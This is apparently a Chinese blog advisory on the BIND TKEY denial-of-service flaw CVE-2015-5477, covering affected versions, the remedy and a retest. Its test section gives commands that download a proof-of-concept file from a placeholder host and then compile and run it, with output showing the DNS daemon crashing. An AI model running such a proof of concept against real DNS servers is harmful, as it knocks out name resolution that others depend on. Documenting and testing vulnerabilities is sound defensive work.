最新消息:

DNS服务器软件BIND曝严重DoS漏洞(CVE-2015-5477)

IT技术 ipcpu 5168浏览

DNS服务器软件BIND曝严重DoS漏洞(CVE-2015-5477)

漏洞描述

近期ISC发布了一个安全漏洞(cve-2015-5477),该漏洞影响当前Bind所有非最新版本,黑客可以利用该漏洞对BIND DNS服务进行DOS攻击,导致DNS服务进程结束。

漏洞影响

自编译版本 9.1.0 -> 9.8.x, 9.9.0->9.9.7-P1, 9.10.0->9.10.2-P2
Redhat AS6 版本 < bind-9.8.2-0.37.rc1.el6_7.2版本
Redhat AS5 版本 < bind-9.3.6-25.P1.el5_11.3 版本

漏洞测试

非常危险,请勿测试线上服务——存在漏洞的DNS服务守护进程会crash
A. 测试方法

  1. [@ ~]# wget http://NOTVALID/script/tkill.c
  2. [@ ~]# gcc -g -o tkill tkill.c
  3. [@ ~]# chmod a+x tkill
  4. [@ ~]# ./tkill localhost
  5. #如DNS服务crash,说明该DNS存在漏洞,如出现 not vulnerable字样,则表示漏洞未生效。

B. 测试现象

  1. [@ ~]# ./tkill localhost
  2. --- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
  3. [+] localhost: Resolving to IP address
  4. [+] localhost: Resolved to multiple IPs (NOTE)
  5. [+] ::1: Probing...
  6. [+] Querying version...
  7. [+] ::1: "9.11.0pre-alpha"
  8. [+] Sending DoS packet...
  9. [+] Waiting 5-sec for response...
  10. [+] timed out, probably crashed
  11. [+] 127.0.0.1: Probing...
  12. [+] Querying version...
  13. [-] timed out getting version, trying again
  14. [-] timed out getting version, trying again
  15. [-] timed out getting version, trying again
  16. [-] Can't query server, is it crashed already?
  17. [-] Sending exploit anyway.
  18. [+] Sending DoS packet...
  19. [+] Waiting 5-sec for response...
  20. [+] timed out, probably crashed

经检查named进程已经crash

C. 服务日志

  1. Aug 4 15:32:48 dns named[2717]: client a.b.c. d#42212 (foo.bar): view north_america: query: foo. bar ANY TKEY + (x.y.z.zz)

解决方案:

升级到最新版,手动编译版本也可以打补丁。

官方网站貌似没有补丁包,可以从Redhat的FTP提供的srpm文件查找

  1. [@ ~]# yum update bind

更新后的测试

  1. [@ ~]# ./tkill localhost
  2. --- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
  3. [+] localhost: Resolving to IP address
  4. [+] localhost: Resolved to multiple IPs (NOTE)
  5. [+] 127.0.0.1: Probing...
  6. [+] Querying version...
  7. [+] 127.0.0.1: "9.3.6-P1-RedHat-9.3.6-25.P1.el5_11.3"
  8. [+] Sending DoS packet...
  9. [+] Waiting 5-sec for response...
  10. [-] 127.0.0.1: got response, so probably not vulnerable

相关链接:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477
http://www.isc.org/downloads
https://ring0.me/2015/08/exploit-dns-server-with-one-packet/

转载请注明:IPCPU-网络之路 » DNS服务器软件BIND曝严重DoS漏洞(CVE-2015-5477)